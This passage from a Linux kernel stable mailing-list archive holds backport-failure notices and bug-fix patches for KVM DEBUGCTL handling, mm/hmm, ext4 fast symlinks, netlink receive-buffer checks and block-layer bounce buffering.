@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 188cb385bbf04d486df3e52f28c47b3961f5f0c0
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081229-useable-overhung-5a62@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 188cb385bbf04d486df3e52f28c47b3961f5f0c0 Mon Sep 17 00:00:00 2001
From: Andy Shevchenko <andriy.shevchenko(a)linux.intel.com>
Date: Thu, 10 Jul 2025 11:23:53 +0300
Subject: [PATCH] mm/hmm: move pmd_to_hmm_pfn_flags() to the respective
#ifdeffery
When pmd_to_hmm_pfn_flags() is unused, it prevents kernel builds with
clang, `make W=1` and CONFIG_TRANSPARENT_HUGEPAGE=n:
mm/hmm.c:186:29: warning: unused function 'pmd_to_hmm_pfn_flags' [-Wunused-function]
Fix this by moving the function to the respective existing ifdeffery
for its the only user.
See also:
6863f5643dd7 ("kbuild: allow Clang to find unused static inline functions for W=1 build")
Link: https://lkml.kernel.org/r/20250710082403.664093-1-andriy.shevchenko@linux.i…
Fixes: 992de9a8b751 ("mm/hmm: allow to mirror vma of a file on a DAX backed filesystem")
Signed-off-by: Andy Shevchenko <andriy.shevchenko(a)linux.intel.com>
Reviewed-by: Leon Romanovsky <leonro(a)nvidia.com>
Reviewed-by: Alistair Popple <apopple(a)nvidia.com>
Cc: Andriy Shevchenko <andriy.shevchenko(a)linux.intel.com>
Cc: Bill Wendling <morbo(a)google.com>
Cc: Jerome Glisse <jglisse(a)redhat.com>
Cc: Justin Stitt <justinstitt(a)google.com>
Cc: Nathan Chancellor <nathan(a)kernel.org>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
diff --git a/mm/hmm.c b/mm/hmm.c
index f2415b4b2cdd..d545e2494994 100644
--- a/mm/hmm.c
+++ b/mm/hmm.c
@@ -183,6 +183,7 @@ static inline unsigned long hmm_pfn_flags_order(unsigned long order)
return order << HMM_PFN_ORDER_SHIFT;
}
+#ifdef CONFIG_TRANSPARENT_HUGEPAGE
static inline unsigned long pmd_to_hmm_pfn_flags(struct hmm_range *range,
pmd_t pmd)
{
@@ -193,7 +194,6 @@ static inline unsigned long pmd_to_hmm_pfn_flags(struct hmm_range *range,
hmm_pfn_flags_order(PMD_SHIFT - PAGE_SHIFT);
}
-#ifdef CONFIG_TRANSPARENT_HUGEPAGE
static int hmm_vma_handle_pmd(struct mm_walk *walk, unsigned long addr,
unsigned long end, unsigned long hmm_pfns[],
pmd_t pmd)
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x 17ec2f965344ee3fd6620bef7ef68792f4ac3af0
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081210-overhand-panhandle-a07f@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 17ec2f965344ee3fd6620bef7ef68792f4ac3af0 Mon Sep 17 00:00:00 2001
From: Sean Christopherson <seanjc(a)google.com>
Date: Tue, 10 Jun 2025 16:20:06 -0700
Subject: [PATCH] KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is
supported
Let the guest set DEBUGCTL.RTM_DEBUG if RTM is supported according to the
guest CPUID model, as debug support is supposed to be available if RTM is
supported, and there are no known downsides to letting the guest debug RTM
aborts.
Note, there are no known bug reports related to RTM_DEBUG, the primary
motivation is to reduce the probability of breaking existing guests when a
future change adds a missing consistency check on vmcs12.GUEST_DEBUGCTL
(KVM currently lets L2 run with whatever hardware supports; whoops).
Note #2, KVM already emulates DR6.RTM, and doesn't restrict access to
DR7.RTM.
Fixes: 83c529151ab0 ("KVM: x86: expose Intel cpu new features (HLE, RTM) to guest")
Cc: stable(a)vger.kernel.org
Link: https://lore.kernel.org/r/20250610232010.162191-5-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
index b7dded3c8113..fa878b136eba 100644
--- a/arch/x86/include/asm/msr-index.h
+++ b/arch/x86/include/asm/msr-index.h
@@ -419,6 +419,7 @@
#define DEBUGCTLMSR_FREEZE_PERFMON_ON_PMI (1UL << 12)
#define DEBUGCTLMSR_FREEZE_IN_SMM_BIT 14
#define DEBUGCTLMSR_FREEZE_IN_SMM (1UL << DEBUGCTLMSR_FREEZE_IN_SMM_BIT)
+#define DEBUGCTLMSR_RTM_DEBUG BIT(15)
#define MSR_PEBS_FRONTEND 0x000003f7
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4ee6cc796855..311f6fa53b67 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2186,6 +2186,10 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
(host_initiated || intel_pmu_lbr_is_enabled(vcpu)))
debugctl |= DEBUGCTLMSR_LBR | DEBUGCTLMSR_FREEZE_LBRS_ON_PMI;
+ if (boot_cpu_has(X86_FEATURE_RTM) &&
+ (host_initiated || guest_cpu_cap_has(vcpu, X86_FEATURE_RTM)))
+ debugctl |= DEBUGCTLMSR_RTM_DEBUG;
+
return debugctl;
}
The check for a fast symlink in the presence of only an
external xattr inode is incorrect. If a fast symlink does
not have an xattr block (i_file_acl == 0), but does have
an external xattr inode that increases inode i_blocks, then
the check for a fast symlink will incorrectly fail and
__ext4_iget()->ext4_ind_check_inode() will report the inode
is corrupt when it "validates" i_data[] on the next read:
# ln -s foo /mnt/tmp/bar
# setfattr -h -n trusted.test \
-v "$(yes | head -n 4000)" /mnt/tmp/bar
# umount /mnt/tmp
# mount /mnt/tmp
# ls -l /mnt/tmp
ls: cannot access '/mnt/tmp/bar': Structure needs cleaning
total 4
? l?????????? ? ? ? ? ? bar
# dmesg | tail -1
EXT4-fs error (device dm-8): __ext4_iget:5098:
inode #24578: block 7303014: comm ls: invalid block
(note that "block 7303014" = 0x6f6f66 = "foo" in LE order).
ext4_inode_is_fast_symlink() should check the superblock
EXT4_FEATURE_INCOMPAT_EA_INODE feature flag, not the inode
EXT4_EA_INODE_FL, since the latter is only set on the xattr
inode itself, and not on the inode that uses this xattr.
Cc: stable(a)vger.kernel.org
Fixes: fc82228a5e38 ("ext4: support fast symlinks from ext3 file systems")
Signed-off-by: Andreas Dilger <adilger(a)whamcloud.com>
Reviewed-by: Li Dongyang <dongyangli(a)ddn.com>
Reviewed-by: Alex Zhuravlev <bzzz(a)whamcloud.com>
Reviewed-by: Oleg Drokin <green(a)whamcloud.com>
Reviewed-on: https://review.whamcloud.com/59879
Lustre-bug-id: https://jira.whamcloud.com/browse/LU-19121
---
fs/ext4/inode.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index be9a4cba35fd..caca88521c75 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -146,7 +146,7 @@ static inline int ext4_begin_ordered_truncate(struct inode *inode,
*/
int ext4_inode_is_fast_symlink(struct inode *inode)
{
- if (!(EXT4_I(inode)->i_flags & EXT4_EA_INODE_FL)) {
+ if (!ext4_has_feature_ea_inode(inode->i_sb)) {
int ea_blocks = EXT4_I(inode)->i_file_acl ?
EXT4_CLUSTER_SIZE(inode->i_sb) >> 9 : 0;
--
2.43.5
netlink_attachskb() checks for the socket's read memory allocation
constraints. Firstly, it has:
rmem < READ_ONCE(sk->sk_rcvbuf)
to check if the just increased rmem value fits into the socket's receive
buffer. If not, it proceeds and tries to wait for the memory under:
rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf)
The checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is
equal to sk->sk_rcvbuf. Thus the function neither successfully accepts
these conditions, nor manages to reschedule the task - and is called in
retry loop for indefinite time which is caught as:
rcu: INFO: rcu_sched self-detected stall on CPU
rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212
(t=26000 jiffies g=230833 q=259957)
NMI backtrace for cpu 0
CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014
Call Trace:
<IRQ>
dump_stack lib/dump_stack.c:120
nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105
nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62
rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335
rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590
update_process_times kernel/time/timer.c:1953
tick_sched_handle kernel/time/tick-sched.c:227
tick_sched_timer kernel/time/tick-sched.c:1399
__hrtimer_run_queues kernel/time/hrtimer.c:1652
hrtimer_interrupt kernel/time/hrtimer.c:1717
__sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113
asm_call_irq_on_stack arch/x86/entry/entry_64.S:808
</IRQ>
netlink_attachskb net/netlink/af_netlink.c:1234
netlink_unicast net/netlink/af_netlink.c:1349
kauditd_send_queue kernel/audit.c:776
kauditd_thread kernel/audit.c:897
kthread kernel/kthread.c:328
ret_from_fork arch/x86/entry/entry_64.S:304
Restore the original behavior of the check which commit in Fixes
accidentally missed when restructuring the code.
Found by Linux Verification Center (linuxtesting.org).
Fixes: ae8f160e7eb2 ("netlink: Fix wraparounds of sk->sk_rmem_alloc.")
Cc: stable(a)vger.kernel.org
Signed-off-by: Fedor Pchelkin <pchelkin(a)ispras.ru>
---
Similar rmem and sk->sk_rcvbuf comparing pattern in
netlink_broadcast_deliver() accepts these values being equal, while
the netlink_dump() case does not - but it goes all the way down to
f9c2288837ba ("netlink: implement memory mapped recvmsg()") and looks
like an irrelevant issue without any real consequences. Though might be
cleaned up if needed.
Updated sk->sk_rmem_alloc vs sk->sk_rcvbuf checks throughout the kernel
diverse in treating the corner case of them being equal.
net/netlink/af_netlink.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
index 6332a0e06596..0fc3f045fb65 100644
--- a/net/netlink/af_netlink.c
+++ b/net/netlink/af_netlink.c
@@ -1218,7 +1218,7 @@ int netlink_attachskb(struct sock *sk, struct sk_buff *skb,
nlk = nlk_sk(sk);
rmem = atomic_add_return(skb->truesize, &sk->sk_rmem_alloc);
- if ((rmem == skb->truesize || rmem < READ_ONCE(sk->sk_rcvbuf)) &&
+ if ((rmem == skb->truesize || rmem <= READ_ONCE(sk->sk_rcvbuf)) &&
!test_bit(NETLINK_S_CONGESTED, &nlk->state)) {
netlink_skb_set_owner_r(skb, sk);
return 0;
--
2.50.1
Buffer bouncing is needed only when memory exists above the lowmem region,
i.e., when max_low_pfn < max_pfn. The previous check (max_low_pfn >=
max_pfn) was inverted and prevented bouncing when it could actually be
required.
Note that bouncing depends on CONFIG_HIGHMEM, which is typically enabled
on 32-bit ARM where not all memory is permanently mapped into the kernel’s
lowmem region.
Branch-Specific Note:
This fix is specific to this branch (6.6.y) only.
In the upstream “tip” kernel, bounce buffer support for highmem pages
was completely removed after kernel version 6.12. Therefore, this
modification is not possible or relevant in the tip branch.
Fixes: 9bb33f24abbd0 ("block: refactor the bounce buffering code")
Cc: stable(a)vger.kernel.org
Signed-off-by: Hardeep Sharma <quic_hardshar(a)quicinc.com>
---
block/blk.h | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/block/blk.h b/block/blk.h
index 67915b04b3c1..f8a1d64be5a2 100644
--- a/block/blk.h
+++ b/block/blk.h
@@ -383,7 +383,7 @@ static inline bool blk_queue_may_bounce(struct request_queue *q)
{
return IS_ENABLED(CONFIG_BOUNCE) &&
q->limits.bounce == BLK_BOUNCE_HIGH &&
- max_low_pfn >= max_pfn;
+ max_low_pfn < max_pfn;
}
static inline struct bio *blk_queue_bounce(struct bio *bio,
--
2.25.1
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081224-material-dismay-771d@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081223-sugar-folic-11b0@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -2174,7 +2174,7 @@ static u64 nested_vmx_truncate_sysenter_addr(struct kvm_vcpu *vcpu,
return (unsigned long)data;
}
-static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated)
{
u64 debugctl = 0;
@@ -2193,8 +2193,7 @@ static u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated
return debugctl;
}
-static bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data,
- bool host_initiated)
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
{
u64 invalid;
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index b5758c33c60f..392e66c7e5fe 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -414,6 +414,9 @@ static inline void vmx_set_intercept_for_msr(struct kvm_vcpu *vcpu, u32 msr,
void vmx_update_cpu_dirty_logging(struct kvm_vcpu *vcpu);
+u64 vmx_get_supported_debugctl(struct kvm_vcpu *vcpu, bool host_initiated);
+bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated);
+
/*
* Note, early Intel manuals have the write-low and read-high bitmap offsets
* the wrong way round. The bitmaps control MSRs 0x00000000-0x00001fff and
The patch below does not apply to the 6.12-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.12.y
git checkout FETCH_HEAD
git cherry-pick -x 095686e6fcb4150f0a55b1a25987fad3d8af58d6
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081223-parameter-cope-c338@gregkh' --subject-prefix 'PATCH 6.12.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 095686e6fcb4150f0a55b1a25987fad3d8af58d6 Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:08 -0700
Subject: [PATCH] KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested
VM-Enter
Add a consistency check for L2's guest_ia32_debugctl, as KVM only supports
a subset of hardware functionality, i.e. KVM can't rely on hardware to
detect illegal/unsupported values. Failure to check the vmcs12 value
would allow the guest to load any harware-supported value while running L2.
Take care to exempt BTF and LBR from the validity check in order to match
KVM's behavior for writes via WRMSR, but without clobbering vmcs12. Even
if VM_EXIT_SAVE_DEBUG_CONTROLS is set in vmcs12, L1 can reasonably expect
that vmcs12->guest_ia32_debugctl will not be modified if writes to the MSR
are being intercepted.
Arguably, KVM _should_ update vmcs12 if VM_EXIT_SAVE_DEBUG_CONTROLS is set
*and* writes to MSR_IA32_DEBUGCTLMSR are not being intercepted by L1, but
that would incur non-trivial complexity and wouldn't change the fact that
KVM's handling of DEBUGCTL is blatantly broken. I.e. the extra complexity
is not worth carrying.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-7-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index 7211c71d4241..1b8b0642fc2d 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -2663,7 +2663,8 @@ static int prepare_vmcs02(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12,
if (vmx->nested.nested_run_pending &&
(vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS)) {
kvm_set_dr(vcpu, 7, vmcs12->guest_dr7);
- vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl);
+ vmcs_write64(GUEST_IA32_DEBUGCTL, vmcs12->guest_ia32_debugctl &
+ vmx_get_supported_debugctl(vcpu, false));
} else {
kvm_set_dr(vcpu, 7, vcpu->arch.dr7);
vmcs_write64(GUEST_IA32_DEBUGCTL, vmx->nested.pre_vmenter_debugctl);
@@ -3156,7 +3157,8 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_DEBUG_CONTROLS) &&
- CC(!kvm_dr7_valid(vmcs12->guest_dr7)))
+ (CC(!kvm_dr7_valid(vmcs12->guest_dr7)) ||
+ CC(!vmx_is_valid_debugctl(vcpu, vmcs12->guest_ia32_debugctl, false))))
return -EINVAL;
if ((vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_PAT) &&
@@ -4608,6 +4610,12 @@ static void sync_vmcs02_to_vmcs12(struct kvm_vcpu *vcpu, struct vmcs12 *vmcs12)
(vmcs12->vm_entry_controls & ~VM_ENTRY_IA32E_MODE) |
(vm_entry_controls_get(to_vmx(vcpu)) & VM_ENTRY_IA32E_MODE);
+ /*
+ * Note! Save DR7, but intentionally don't grab DEBUGCTL from vmcs02.
+ * Writes to DEBUGCTL that aren't intercepted by L1 are immediately
+ * propagated to vmcs12 (see vmx_set_msr()), as the value loaded into
+ * vmcs02 doesn't strictly track vmcs12.
+ */
if (vmcs12->vm_exit_controls & VM_EXIT_SAVE_DEBUG_CONTROLS)
vmcs12->guest_dr7 = vcpu->arch.dr7;
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index 4f827a75d980..6a8b78e954cd 100644
--- a/arch/x86/kvm/vmx/vmx.c
